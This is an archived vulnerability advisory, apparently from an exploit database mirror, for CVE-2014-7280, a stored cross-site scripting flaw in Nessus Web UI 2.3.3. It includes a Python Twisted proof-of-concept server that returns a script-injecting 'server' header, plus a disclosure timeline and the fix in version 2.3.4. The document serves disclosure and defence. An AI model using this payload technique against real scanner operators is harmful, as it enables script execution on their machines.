Skip to content
cyberexploits
webappmultipletext

Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting

Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting

Publié le 2014-10-09

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/multiple/webapps/34929.txt7eac4c3a
raw
Nessus Web UI 2.3.3: Stored XSS

=========================================================



CVE number: CVE-2014-7280

Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html

Vendor advisory: http://www.tenable.com/security/tns-2014-08



-- Info --



Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.



-- Affected version -



Web UI version 2.3.3, Build #83



-- Vulnerability details --



By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.

The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.



-- POC --



#!/usr/bin/env python

import sys

from twisted.web import server, resource

from twisted.internet import reactor

from twisted.python import log



class Site(server.Site):

    def getResourceFor(self, request):

        request.setHeader('server', '<script>alert(1)</script>SomeServer')

        return server.Site.getResourceFor(self, request)



class HelloResource(resource.Resource):

    isLeaf = True

    numberRequests = 0



    def render_GET(self, request):

        self.numberRequests += 1

        request.setHeader("content-type", "text/plain")

return "theSecurityFactory Nessus POC"



log.startLogging(sys.stderr)

reactor.listenTCP(8080, Site(HelloResource()))

reactor.run()



-- Solution --



This issue has been fixed as of version 2.3.4 of the WEB UI.





-- Timeline --



2014-06-12   Release of Web UI version 2.3.3, build#83



2014-06-13        Vulnerability discovered and creation of POC



2014-06-13        Vulnerability responsibly reported to vendor



2014-06-13        Vulnerability acknowledged by vendor



2014-06-13        Release of Web UI version 2.3.4, build#85



2014-XX-XX        Advisory published in coordination with vendor



-- Credit --



Frank Lycops

Frank.lycops [at] thesecurityfactory.be
Voir sur GitHub